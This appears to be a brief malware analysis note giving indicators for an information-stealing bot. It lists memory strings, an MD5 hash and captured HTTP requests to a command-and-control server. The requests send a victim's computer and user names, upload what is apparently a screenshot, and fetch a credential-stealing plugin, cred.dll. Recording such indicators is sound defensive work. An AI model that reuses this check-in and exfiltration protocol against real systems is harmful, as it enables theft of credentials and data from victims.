Login - /g3VbWkG4/login.php
Yara -
--------


Memory based String
-------------------
id=658217688148&vs=3.01&sd=046dcd&os=9&bi=0&ar=0&pc=-unicode-&un=hello1&dm=&av=0&lv=0
/plugins/cred.dll
/index.php?scr=1

Network Based Data
------------------
Md5 : b04abfd2132529f6403373d94201be9f
#########################################################################
POST /f83jd823S/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.47
Content-Length: 85
Cache-Control: no-cache

id=470233125440&vs=3.01&sd=046dcd&os=9&bi=1&ar=1&pc=LOUISE-PC&un=Louise&dm=&av=0&lv=0
##########################################################################

POST /f83jd823S/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----59ff461e9d87fd02300ac1b7abf19f69
Host: 185.215.113.47
Content-Length: 46298
Cache-Control: no-cache

##############################################################################
GET /f83jd823S/plugins/cred.dll HTTP/1.1
Host: 185.215.113.47


